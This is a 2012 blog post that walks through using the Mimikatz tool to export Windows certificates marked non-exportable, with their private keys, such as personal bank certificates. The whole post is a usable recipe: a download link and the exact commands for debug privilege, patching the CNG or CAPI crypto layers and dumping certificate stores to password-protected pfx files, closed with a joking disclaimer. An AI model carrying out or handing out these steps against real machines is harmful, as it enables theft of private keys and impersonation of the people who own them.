Sunday, January 22, 2012

Export (supposedly) non exportable Certificates

Today I'll expain how to export (supposedly) non-exportable Certificates in Windows. Here is a crafty tool, Mimikatz that can export ANY certificate. Yes, you can export even your personal Bank certificate, and it won't ask you for a password. Makes you wonder, how safe you really are. All you need is Administrative rights + it works on Windows Vista/7 !

First of all, download the archive containing the tool (the latest release is in the trunk). Get it here: http://blog.gentilkiwi.com/mimikatz

Extract the contents, access the either the Win32 or x64 folder (depends which OS you have installed, 32 or 64 bit) and run mimikatz.exe

1) A Command prompt will apear, and there you need to type:
privilege::debug

2) Afterwards type this:
crypto::patchcng

2b) If you get errors, try this instead:
crypto::patchcapi

3) And the last step:
crypto::exportCertificates

3b) Again, if you get errors, try this one:
crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE

Your Certificate(s) should now be dumped to your Documents folder. They are the pfx files and have assigned a password, "mimikatz". That is what you will need to input when you try to import them on any computer.

Enjoy, and remember not to use this for malicious purposes :P

9 comments: